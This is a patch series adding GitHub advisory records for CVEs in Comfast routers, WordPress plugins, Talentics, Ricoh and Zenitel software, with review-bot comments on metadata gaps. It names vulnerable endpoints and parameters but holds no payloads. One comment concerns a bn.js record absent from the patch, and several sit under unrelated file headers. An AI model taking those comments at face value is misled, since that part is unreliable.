diff --git a/advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json b/advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json
new file mode 100644
index 0000000000000..5093e5f59ce89
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5fgx-x2mx-c652/GHSA-5fgx-x2mx-c652.json
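Review bot: `"affected": []` is empty in the GHSA-378v-28hj-76wf record even though `details` names the package (bn.js) and the first fixed version (5.2.3). Tooling that matches on `affected[].package` and version ranges therefore cannot flag a vulnerable install from this file; only the free-text `details` carries the range. If the record should be machine-matchable before review, the range from `details` could be stated as below. The `npm` ecosystem is inferred from the `SNYK-JS-` reference and the bn.js repository links, so it should be confirmed.

```json
"affected": [
  {
    "package": {
      "ecosystem": "npm",
      "name": "bn.js"
    },
    "ranges": [
      {
        "type": "ECOSYSTEM",
        "events": [
          { "introduced": "0" },
          { "fixed": "5.2.3" }
        ]
      }
    ]
  }
],
```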
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5fgx-x2mx-c652",
+ "modified": "2026-02-20T06:30:39Z",
+ "published": "2026-02-20T06:30:39Z",
+ "aliases": [
+ "CVE-2026-2824"
+ ],
+ "details": "A flaw has been found in Comfast CF-E7 2.6.0.9. This affects the function sub_441CF4 of the file /cgi-bin/mbox-config?method=SET§ion=ping_config of the component webmggnt. Executing a manipulation of the argument destination can lead to command injection. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2824"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/jinhao118/cve/blob/main/ComFast%20Router_4.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.346949"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.346949"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.753878"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T06:17:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-6fw7-r4h4-7857/GHSA-6fw7-r4h4-7857.json b/advisories/unreviewed/2026/02/GHSA-6fw7-r4h4-7857/GHSA-6fw7-r4h4-7857.json
new file mode 100644
index 0000000000000..85dac78e232b2
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-6fw7-r4h4-7857/GHSA-6fw7-r4h4-7857.json
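Review bot: The endpoint in `details` of the GHSA-5fgx-x2mx-c652 record reads `/cgi-bin/mbox-config?method=SET§ion=ping_config`. The `§` looks like `&sect` from `&section=` decoded as an HTML entity somewhere upstream, so the query string is not the one the device actually exposes. It should presumably read `method=SET&section=ping_config`. The GHSA-6wwj-pg79-rf37 record later in this patch has the same garbling in `SET§ion=ntp_timezone`. Log searches or filtering rules written from this text should use the corrected form.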
@@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fw7-r4h4-7857", + "modified": "2026-02-20T06:30:39Z", + "published": "2026-02-20T06:30:39Z", + "aliases": [ + "CVE-2026-27325" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27325" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json b/advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json new file mode 100644 index 0000000000000..3b2a346b5c526 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6wwj-pg79-rf37/GHSA-6wwj-pg79-rf37.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6wwj-pg79-rf37", + "modified": "2026-02-20T06:30:39Z", + "published": "2026-02-20T06:30:39Z", + "aliases": [ + "CVE-2026-2823" + ], + "details": "A vulnerability was detected in Comfast CF-E7 2.6.0.9. The impacted element is the function sub_41ACCC of the file /cgi-bin/mbox-config?method=SET§ion=ntp_timezone of the component webmggnt. Performing a manipulation of the argument timestr results in command injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2823" + }, + { + "type": "WEB", + "url": "https://github.com/jinhao118/cve/blob/main/ComFast%20Router_3.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346948" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346948" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753871" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T05:17:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7544-9rpr-83f6/GHSA-7544-9rpr-83f6.json b/advisories/unreviewed/2026/02/GHSA-7544-9rpr-83f6/GHSA-7544-9rpr-83f6.json new file mode 100644 index 0000000000000..f5987cd7d20f2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7544-9rpr-83f6/GHSA-7544-9rpr-83f6.json 
@@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7544-9rpr-83f6", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27321" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27321" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cg6c-xr24-rrqf/GHSA-cg6c-xr24-rrqf.json b/advisories/unreviewed/2026/02/GHSA-cg6c-xr24-rrqf/GHSA-cg6c-xr24-rrqf.json new file mode 100644 index 0000000000000..e65ae1f219a44 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cg6c-xr24-rrqf/GHSA-cg6c-xr24-rrqf.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cg6c-xr24-rrqf", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27323" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27323" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j27m-px7h-crj7/GHSA-j27m-px7h-crj7.json b/advisories/unreviewed/2026/02/GHSA-j27m-px7h-crj7/GHSA-j27m-px7h-crj7.json new file mode 100644 index 0000000000000..3cf3cee2153ca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j27m-px7h-crj7/GHSA-j27m-px7h-crj7.json 
@@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j27m-px7h-crj7", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27324" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27324" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p922-cfp2-x9v3/GHSA-p922-cfp2-x9v3.json b/advisories/unreviewed/2026/02/GHSA-p922-cfp2-x9v3/GHSA-p922-cfp2-x9v3.json new file mode 100644 index 0000000000000..4519f57b02b0b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p922-cfp2-x9v3/GHSA-p922-cfp2-x9v3.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p922-cfp2-x9v3", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27319" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27319" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w4rx-r6r4-5c2v/GHSA-w4rx-r6r4-5c2v.json b/advisories/unreviewed/2026/02/GHSA-w4rx-r6r4-5c2v/GHSA-w4rx-r6r4-5c2v.json new file mode 100644 index 0000000000000..0f9646a7052d4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w4rx-r6r4-5c2v/GHSA-w4rx-r6r4-5c2v.json 
@@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4rx-r6r4-5c2v", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27317" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27317" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w8hp-9h4v-r2fg/GHSA-w8hp-9h4v-r2fg.json b/advisories/unreviewed/2026/02/GHSA-w8hp-9h4v-r2fg/GHSA-w8hp-9h4v-r2fg.json new file mode 100644 index 0000000000000..2727785fe1b40 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w8hp-9h4v-r2fg/GHSA-w8hp-9h4v-r2fg.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w8hp-9h4v-r2fg", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27322" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27322" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wr9x-74ff-qxqp/GHSA-wr9x-74ff-qxqp.json b/advisories/unreviewed/2026/02/GHSA-wr9x-74ff-qxqp/GHSA-wr9x-74ff-qxqp.json new file mode 100644 index 0000000000000..432445d29590e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wr9x-74ff-qxqp/GHSA-wr9x-74ff-qxqp.json 
@@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wr9x-74ff-qxqp", + "modified": "2026-02-20T06:30:38Z", + "published": "2026-02-20T06:30:38Z", + "aliases": [ + "CVE-2026-27318" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27318" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T04:15:57Z" + } +} \ No newline at end of file From 86b286164dd79593d644908a455050cd531d3894 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 09:32:45 +0000 Subject: [PATCH 04/77] Publish Advisories GHSA-3pj6-82hg-m85c GHSA-5rxr-34pc-59ph GHSA-73q4-fmxg-jffc GHSA-cf6f-74jc-gm3q GHSA-xw2v-8hw2-2rc4 --- .../GHSA-3pj6-82hg-m85c.json | 6 ++- .../GHSA-5rxr-34pc-59ph.json | 44 ++++++++++++++++ .../GHSA-73q4-fmxg-jffc.json | 52 +++++++++++++++++++ .../GHSA-cf6f-74jc-gm3q.json | 38 ++++++++++++++ .../GHSA-xw2v-8hw2-2rc4.json | 44 ++++++++++++++++ 5 files changed, 183 insertions(+), 1 deletion(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-5rxr-34pc-59ph/GHSA-5rxr-34pc-59ph.json create mode 100644 advisories/unreviewed/2026/02/GHSA-73q4-fmxg-jffc/GHSA-73q4-fmxg-jffc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xw2v-8hw2-2rc4/GHSA-xw2v-8hw2-2rc4.json diff --git a/advisories/unreviewed/2026/02/GHSA-3pj6-82hg-m85c/GHSA-3pj6-82hg-m85c.json b/advisories/unreviewed/2026/02/GHSA-3pj6-82hg-m85c/GHSA-3pj6-82hg-m85c.json index 6b71510297b7a..7142e40db226f 100644 --- a/advisories/unreviewed/2026/02/GHSA-3pj6-82hg-m85c/GHSA-3pj6-82hg-m85c.json +++ b/advisories/unreviewed/2026/02/GHSA-3pj6-82hg-m85c/GHSA-3pj6-82hg-m85c.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3pj6-82hg-m85c", - "modified": "2026-02-18T00:30:16Z", + "modified": "2026-02-20T09:31:21Z", "published": "2026-02-18T00:30:16Z", "aliases": [ "CVE-2026-2629" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/jishi/node-sonos-http-api/issues/915" }, + { + "type": "WEB", + "url": "https://github.com/XavLimSG/Vulnerability-Research/blob/main/CVE-2026-2629/CVE-2026-2629.md" + }, { "type": "WEB", "url": "https://github.com/jishi/node-sonos-http-api" diff --git a/advisories/unreviewed/2026/02/GHSA-5rxr-34pc-59ph/GHSA-5rxr-34pc-59ph.json b/advisories/unreviewed/2026/02/GHSA-5rxr-34pc-59ph/GHSA-5rxr-34pc-59ph.json new file mode 100644 index 0000000000000..5baf33f01c813 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5rxr-34pc-59ph/GHSA-5rxr-34pc-59ph.json 
@@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5rxr-34pc-59ph", + "modified": "2026-02-20T09:31:21Z", + "published": "2026-02-20T09:31:21Z", + "aliases": [ + "CVE-2026-26050" + ], + "details": "The installer for ジョブログ集計/分析ソフトウェア RICOHジョブログ集計ツール versions prior to Ver.1.3.7 contains an issue with the DLL search path, which may lead to insecurely loading Dynamic Link Libraries. As a result, arbitrary code may be executed with administrative privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26050" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN69531868" + }, + { + "type": "WEB", + "url": "https://support.ricoh.com/bbv2/html/dr_ut_d/ut/history/w/bb/pub_j/dr_ut_d/4101031/4101031555/V137/5260588/260588/history.htm" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T09:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-73q4-fmxg-jffc/GHSA-73q4-fmxg-jffc.json b/advisories/unreviewed/2026/02/GHSA-73q4-fmxg-jffc/GHSA-73q4-fmxg-jffc.json new file mode 100644 index 0000000000000..b6a817afe2a25 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-73q4-fmxg-jffc/GHSA-73q4-fmxg-jffc.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-73q4-fmxg-jffc", + "modified": "2026-02-20T09:31:21Z", + "published": "2026-02-20T09:31:21Z", + "aliases": [ + "CVE-2026-2825" + ], + "details": "A vulnerability has been found in rachelos WeRSS we-mp-rss up to 1.4.8. This impacts the function fix_html of the file tools/fix.py of the component Article Module. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2825" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346950" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346950" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753879" + }, + { + "type": "WEB", + "url": "https://www.notion.so/WeRSS-Stored-Cross-Site-Scripting-XSS-in-Article-module-300ea92a3c4180be87dffca6b47d17f7" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T07:16:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json b/advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json new file mode 100644 index 0000000000000..728e7288599ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cf6f-74jc-gm3q/GHSA-cf6f-74jc-gm3q.json 
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cf6f-74jc-gm3q",
+ "modified": "2026-02-20T09:31:21Z",
+ "published": "2026-02-20T09:31:21Z",
+ "aliases": [
+ "CVE-2025-59819"
+ ],
+ "details": "This vulnerability allows authenticated attackers to read an arbitrary file by changing a filepath parameter into an internal system path.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59819"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wiki.zenitel.com/wiki/AlphaCom_13.02_-_Release_Notes"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.zenitel.com/sites/default/files/2025-12/A100K12333%20Zenitel%20Security%20Advisory.pdf"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T08:17:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-xw2v-8hw2-2rc4/GHSA-xw2v-8hw2-2rc4.json b/advisories/unreviewed/2026/02/GHSA-xw2v-8hw2-2rc4/GHSA-xw2v-8hw2-2rc4.json
new file mode 100644
index 0000000000000..a5aca835cc3f6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-xw2v-8hw2-2rc4/GHSA-xw2v-8hw2-2rc4.json
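Review bot: `cwe_ids` is empty in the GHSA-cf6f-74jc-gm3q record although `details` describes an authenticated arbitrary file read through a `filepath` parameter. That is normally classified as path traversal, so CWE-based filtering will miss this record; `"cwe_ids": ["CWE-22"]` would fit if the vendor advisory confirms the mechanism. `details` also never names the product or a fixed version. Only the reference URLs point to Zenitel AlphaCom 13.02 release notes, so someone triaging from the text cannot tell what to patch; a leading sentence naming the product would close that gap.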
@@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw2v-8hw2-2rc4", + "modified": "2026-02-20T09:31:21Z", + "published": "2026-02-20T09:31:21Z", + "aliases": [ + "CVE-2026-26370" + ], + "details": "WordPress Plugin \"Survey Maker\" versions 5.1.7.7 and prior contain a cross-site scripting vulnerability. If this vulnerability is exploited, an arbitrary script may be executed in the user's web browser.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26370" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN20049394" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/survey-maker" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T08:17:03Z" + } +} \ No newline at end of file From 7b0594e6433ca1f7de318459cf8f9e06f8f903dc Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 12:32:50 +0000 Subject: [PATCH 05/77] Publish Advisories GHSA-4jf6-4wfh-g46g GHSA-w4wv-h996-6v9c --- .../GHSA-4jf6-4wfh-g46g.json | 36 +++++++++++++++++ .../GHSA-w4wv-h996-6v9c.json | 40 +++++++++++++++++++ 2 files changed, 76 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-4jf6-4wfh-g46g/GHSA-4jf6-4wfh-g46g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w4wv-h996-6v9c/GHSA-w4wv-h996-6v9c.json 
diff --git a/advisories/unreviewed/2026/02/GHSA-4jf6-4wfh-g46g/GHSA-4jf6-4wfh-g46g.json b/advisories/unreviewed/2026/02/GHSA-4jf6-4wfh-g46g/GHSA-4jf6-4wfh-g46g.json
new file mode 100644
index 0000000000000..74e6bbe79fedf
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4jf6-4wfh-g46g/GHSA-4jf6-4wfh-g46g.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4jf6-4wfh-g46g",
+ "modified": "2026-02-20T12:31:25Z",
+ "published": "2026-02-20T12:31:25Z",
+ "aliases": [
+ "CVE-2025-10970"
+ ],
+ "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Kolay Software Inc. Talentics allows Blind SQL Injection.This issue affects Talentics: through 20022026.\n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10970"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usom.gov.tr/bildirim/tr-26-0081"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T12:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-w4wv-h996-6v9c/GHSA-w4wv-h996-6v9c.json b/advisories/unreviewed/2026/02/GHSA-w4wv-h996-6v9c/GHSA-w4wv-h996-6v9c.json
new file mode 100644
index 0000000000000..f6d73b0c01487
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-w4wv-h996-6v9c/GHSA-w4wv-h996-6v9c.json
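Review bot: The upper bound in `details` of the GHSA-4jf6-4wfh-g46g record, `through 20022026`, reads as a date (20 February 2026, the publication day) rather than a product version. It cannot be compared against an installed build, and it probably means no fixed release was known at publication. With `affected` empty and the NOTE saying the vendor did not respond, a CRITICAL unauthenticated SQL injection is left without any usable version boundary. If that is the intent, plainer wording such as `all versions as of 2026-02-20; no fix known` would say so. The same sentence is also missing a space in `Injection.This issue`.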
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4wv-h996-6v9c", + "modified": "2026-02-20T12:31:25Z", + "published": "2026-02-20T12:31:25Z", + "aliases": [ + "CVE-2026-2486" + ], + "details": "The Master Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ma_el_bh_table_btn_text' parameter in versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2486" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3461745/master-addons/tags/2.1.2/addons/ma-business-hours/ma-business-hours.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a78c2621-afff-40b4-ae45-831b2b847756?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T12:16:16Z" + } +} \ No newline at end of file From f9e9f64e636d8ec96d0d68aca1ed30a91376405a Mon Sep 17 00:00:00 2001 
